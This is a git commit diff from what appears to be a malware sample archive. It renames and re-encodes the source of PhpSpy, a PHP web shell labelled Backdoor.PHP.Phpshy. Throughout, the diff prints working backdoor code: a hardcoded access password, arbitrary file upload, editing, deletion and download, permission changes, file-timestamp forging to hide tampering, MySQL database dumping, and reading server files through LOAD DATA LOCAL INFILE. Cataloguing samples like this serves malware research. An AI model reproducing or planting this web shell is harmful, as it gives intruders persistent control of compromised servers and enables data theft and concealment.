Rename Trojan-Spy.PHP.PhPen.f to Backdoor.PHP.Phpshy.a.s

2024-12-19 18:06:10 +00:00 · 2020-11-02 23:45:49 -06:00 · 2020-11-02 23:45:49 -06:00 · 2e53d3891f
commit 2e53d3891f
parent 20884073a5
1 changed files with 63 additions and 63 deletions
--- a/PHP/Backdoor.PHP.Phpshy.a.s
+++ b/PHP/Backdoor.PHP.Phpshy.a.s
@ -2,17 +2,17 @@

 /*****************************************************************************

-===================== 请误用于非法用途，造成一切后果与本人无关。====================
+===================== 请误用于非法用途，造成一切后果与本人无关。====================

-发布此版本是为了纪念安全天使曾经的辉煌。
+发布此版本是为了纪念安全天使曾经的辉煌。

-感谢你们与我一同走过：Sniper\Super·Hei\kEvin1986\saiy\wofeiwo。
+感谢你们与我一同走过：Sniper\Super·Hei\kEvin1986\saiy\wofeiwo。

-感谢所有的朋友们、兄弟们。多谢你们的关心和支持！
+感谢所有的朋友们、兄弟们。多谢你们的关心和支持！

-选择在1月7日发布是为了纪念我老婆的生日，预祝我在本命年里。咸鱼翻身！
+选择在1月7日发布是为了纪念我老婆的生日，预祝我在本命年里。咸鱼翻身！

-====================== 最后预祝安全天使的每一位朋友飞黄腾达 =======================
+====================== 最后预祝安全天使的每一位朋友飞黄腾达 =======================

 Codz by angel(4ngel)

@ -47,23 +47,23 @@ foreach(array('_GET','_POST') as $_request) {
 	}
 }

-/*===================== 程序配置 =====================*/
+/*===================== 程序配置 =====================*/
 $admin = array();
-// 是否需要密码验证, true 为需要验证, false 为直接进入.下面选项则无效
+// 是否需要密码验证, true 为需要验证, false 为直接进入.下面选项则无效
 $admin['check'] = true;
-// 如果需要密码验证,请修改登陆密码
+// 如果需要密码验证,请修改登陆密码
 $admin['pass']  = 'kolya';

-//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
-// cookie 前缀
+//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
+// cookie 前缀
 $admin['cookiepre'] = '';
-// cookie 作用域
+// cookie 作用域
 $admin['cookiedomain'] = '';
-// cookie 作用路径
+// cookie 作用路径
 $admin['cookiepath'] = '/';
-// cookie 有效期
+// cookie 有效期
 $admin['cookielife'] = 86400;
-/*===================== 配置结束 =====================*/
+/*===================== 配置结束 =====================*/

 if ($charset == 'utf8') {
 	header("content-Type: text/html; charset=utf-8");
@ -78,7 +78,7 @@ if ($charset == 'utf8') {
 $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
 $timestamp = time();

-/*===================== 身份验证 =====================*/
+/*===================== 身份验证 =====================*/
 if ($action == "logout") {
 	scookie('phpspypass', '', -86400 * 365);
 	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
@ -102,11 +102,11 @@ if($admin['check']) {
 		loginpage();
 	}
 }
-/*===================== 验证结束 =====================*/
+/*===================== 验证结束 =====================*/

 $errmsg = '';

-// 查看PHPINFO
+// 查看PHPINFO
 if ($action == 'phpinfo') {
 	if (IS_PHPINFO) {
 		phpinfo();
@ -115,7 +115,7 @@ if ($action == 'phpinfo') {
 	}
 }

-// 下载文件
+// 下载文件
 if ($doing == 'downfile' && $thefile) {
 	if (!@file_exists($thefile)) {
 		$errmsg = 'The file you want Downloadable was nonexistent';
@ -129,7 +129,7 @@ if ($doing == 'downfile' && $thefile) {
 	}
 }

-// 直接下载备份数据库
+// 直接下载备份数据库
 if ($doing == 'backupmysql' && !$saveasfile) {
 	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 	$table = array_flip($table);
@ -148,7 +148,7 @@ if ($doing == 'backupmysql' && !$saveasfile) {
 	exit;
 }

-// 通过MYSQL下载文件
+// 通过MYSQL下载文件
 if($doing=='mysqldown'){
 	if (!$dbname) {
 		$errmsg = 'Please input dbname';
@ -161,7 +161,7 @@ if($doing=='mysqldown'){
 			if(!$result){
 				q("DROP TABLE IF EXISTS tmp_angel;");
 				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
-				//用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况
+				//用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况
 				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
 				$result = q("select content from tmp_angel");
 				q("DROP TABLE tmp_angel");
@ -247,7 +247,7 @@ formfoot();

 $errmsg && m($errmsg);

-// 获取当前路径
+// 获取当前路径
 !$dir && $dir = '.';
 $nowpath = getPath(SA_ROOT, $dir);
 if (substr($dir, -1) != '/') {
@ -257,10 +257,10 @@ $uedir = ue($dir);

 if (!$action || $action == 'file') {

-	// 判断读写情况
+	// 判断读写情况
 	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

-	// 删除目录
+	// 删除目录
 	if ($doing == 'deldir' && $thefile) {
 		if (!file_exists($thefile)) {
 			m($thefile.' directory does not exist');
@ -269,7 +269,7 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 创建目录
+	// 创建目录
 	elseif ($newdirname) {
 		$mkdirs = $nowpath.$newdirname;
 		if (file_exists($mkdirs)) {
@ -280,19 +280,19 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 上传文件
+	// 上传文件
 	elseif ($doupfile) {
 		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
 	}

-	// 编辑文件
+	// 编辑文件
 	elseif ($editfilename && $filecontent) {
 		$fp = @fopen($editfilename,'w');
 		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
 		@fclose($fp);
 	}

-	// 编辑文件属性
+	// 编辑文件属性
 	elseif ($pfile && $newperm) {
 		if (!file_exists($pfile)) {
 			m('The original file does not exist');
@ -302,7 +302,7 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 改名
+	// 改名
 	elseif ($oldname && $newfilename) {
 		$nname = $nowpath.$newfilename;
 		if (file_exists($nname) || !file_exists($oldname)) {
@ -312,7 +312,7 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 复制文件
+	// 复制文件
 	elseif ($sname && $tofile) {
 		if (file_exists($tofile) || !file_exists($sname)) {
 			m('The goal file has already existed or original file does not exist');
@ -321,7 +321,7 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 克隆时间
+	// 克隆时间
 	elseif ($curfile && $tarfile) {
 		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
 			m('The goal file has already existed or original file does not exist');
@ -331,7 +331,7 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 自定义时间
+	// 自定义时间
 	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
 		if (!@file_exists($curfile)) {
 			m(basename($curfile).' does not exist');
@ -341,7 +341,7 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 打包下载
+	// 打包下载
 	elseif($doing == 'downrar') {
 		if ($dl) {
 			$dfiles='';
@ -363,7 +363,7 @@ if (!$action || $action == 'file') {
 		}
 	}

-	// 批量删除文件
+	// 批量删除文件
 	elseif($doing == 'delfiles') {
 		if ($dl) {
 			$dfiles='';
@ -375,13 +375,13 @@ if (!$action || $action == 'file') {
 					$fail++;
 				}
 			}
-			m('Deleted file have finished，choose '.count($dl).' success '.$succ.' fail '.$fail);
+			m('Deleted file have finished，choose '.count($dl).' success '.$succ.' fail '.$fail);
 		} else {
 			m('Please select file(s)');
 		}
 	}

-	//操作完毕
+	//操作完毕
 	formhead(array('name'=>'createdir'));
 	makehide('newdirname');
 	makehide('dir',$nowpath);
@ -516,14 +516,14 @@ function godir(dir,view_writable){

 	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');

-	//查看所有可写文件和目录
+	//查看所有可写文件和目录
 	$dirdata=array();
 	$filedata=array();

 	if ($view_writable) {
 		$dirdata = GetList($nowpath);
 	} else {
-		// 目录列表
+		// 目录列表
 		$dirs=@opendir($dir);
 		while ($file=@readdir($dirs)) {
 			$filepath=$nowpath.$file;
@ -826,7 +826,7 @@ function settable(tablename,doing,page) {
 }
 </script>
 <?php
-	//操作记录
+	//操作记录
 	formhead(array('name'=>'recordlist'));
 	makehide('doing');
 	makehide('action','sqladmin');
@ -835,7 +835,7 @@ function settable(tablename,doing,page) {
 	p($dbform);
 	formfoot();

-	//选定数据库
+	//选定数据库
 	formhead(array('name'=>'setdbname'));
 	makehide('action','sqladmin');
 	p($dbform);
@ -844,7 +844,7 @@ function settable(tablename,doing,page) {
 	}
 	formfoot();

-	//选定表
+	//选定表
 	formhead(array('name'=>'settable'));
 	makehide('action','sqladmin');
 	p($dbform);
@ -864,12 +864,12 @@ function settable(tablename,doing,page) {
 	}
 	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
 		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
-		//获取数据库信息
+		//获取数据库信息
 		$mysqlver = mysql_get_server_info();
 		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
 		$highver = $mysqlver > '4.1' ? 1 : 0;

-		//获取数据库
+		//获取数据库
 		$query = q("SHOW DATABASES");
 		$dbs = array();
 		$dbs[] = '-- Select a database --';
@ -1347,7 +1347,7 @@ else {
 <?php

 /*======================================================
-函数库
+函数库
 ======================================================*/

 function m($msg) {
@ -1397,7 +1397,7 @@ function multi($num, $perpage, $curpage, $tablename) {
 	}
 	return $multipage;
 }
-// 登陆入口
+// 登陆入口
 function loginpage() {
 ?>
 	<style type="text/css">
@ -1452,7 +1452,7 @@ function cf($fname,$text){
 	}
 }

-// 页面调试信息
+// 页面调试信息
 function debuginfo() {
 	global $starttime;
 	$mtime = explode(' ', microtime());
@ -1460,7 +1460,7 @@ function debuginfo() {
 	echo 'Processed in '.$totaltime.' second(s)';
 }

-//连接数据库
+//连接数据库
 function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
 	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
 		p('<h2>Can not connect to MySQL server</h2>');
@ -1480,7 +1480,7 @@ function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
 	return $link;
 }

-// 去掉转义字符
+// 去掉转义字符
 function s_array(&$array) {
 	if (is_array($array)) {
 		foreach ($array as $k => $v) {
@ -1492,7 +1492,7 @@ function s_array(&$array) {
 	return $array;
 }

-// 清除HTML代码
+// 清除HTML代码
 function html_clean($content) {
 	$content = htmlspecialchars($content);
 	$content = str_replace("\n", "<br />", $content);
@ -1501,7 +1501,7 @@ function html_clean($content) {
 	return $content;
 }

-// 获取权限
+// 获取权限
 function getChmod($filepath){
 	return substr(base_convert(@fileperms($filepath),10,8),-4);
 }
@ -1544,7 +1544,7 @@ function getUser($filepath)	{
 	return '';
 }

-// 删除目录
+// 删除目录
 function deltree($deldir) {
 	$mydir=@dir($deldir);	
 	while($file=$mydir->read())	{ 		
@ -1562,13 +1562,13 @@ function deltree($deldir) {
 	return @rmdir($deldir) ? 1 : 0;
 }

-// 表格行间的背景色替换
+// 表格行间的背景色替换
 function bg() {
 	global $bgc;
 	return ($bgc++%2==0) ? 'alt1' : 'alt2';
 }

-// 获取当前的文件系统路径
+// 获取当前的文件系统路径
 function getPath($scriptpath, $nowpath) {
 	if ($nowpath == '.') {
 		$nowpath = $scriptpath;
@ -1581,7 +1581,7 @@ function getPath($scriptpath, $nowpath) {
 	return $nowpath;
 }

-// 获取当前目录的上级目录
+// 获取当前目录的上级目录
 function getUpPath($nowpath) {
 	$pathdb = explode('/', $nowpath);
 	$num = count($pathdb);
@ -1593,7 +1593,7 @@ function getUpPath($nowpath) {
 	return $uppath;
 }

-// 检查PHP配置参数
+// 检查PHP配置参数
 function getcfg($varname) {
 	$result = get_cfg_var($varname);
 	if ($result == 0) {
@ -1605,7 +1605,7 @@ function getcfg($varname) {
 	}
 }

-// 检查函数情况
+// 检查函数情况
 function getfun($funName) {
 	return (false !== function_exists($funName)) ? 'Yes' : 'No';
 }
@ -1672,7 +1672,7 @@ function sizecount($size) {
 	return $size;
 }

-// 压缩打包类
+// 压缩打包类
 class PHPZip{
 	var $out='';
 	function PHPZip($dir)	{
@ -1680,7 +1680,7 @@ class PHPZip{
 			$curdir = getcwd();
 			if (is_array($dir)) $filelist = $dir;
 			else{
-				$filelist=$this -> GetFileList($dir);//文件列表
+				$filelist=$this -> GetFileList($dir);//文件列表
 				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
 			}
 			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
@ -1703,7 +1703,7 @@ class PHPZip{
 		else return 0;
 	}

-	// 获得指定目录文件列表
+	// 获得指定目录文件列表
 	function GetFileList($dir){
 		static $a;
 		if (is_dir($dir)) {
@ -1803,7 +1803,7 @@ class PHPZip{
 	}
 }

-// 备份数据库
+// 备份数据库
 function sqldumptable($table, $fp=0) {
 	$tabledump = "DROP TABLE IF EXISTS $table;\n";
 	$tabledump .= "CREATE TABLE $table (\n";
@ -1980,11 +1980,11 @@ function formfoot(){
 	p('</form>');
 }

-// 调试函数
+// 调试函数
 function pr($a) {
 	echo '<pre>';
 	print_r($a);
 	echo '</pre>';
 }

-?>
+?>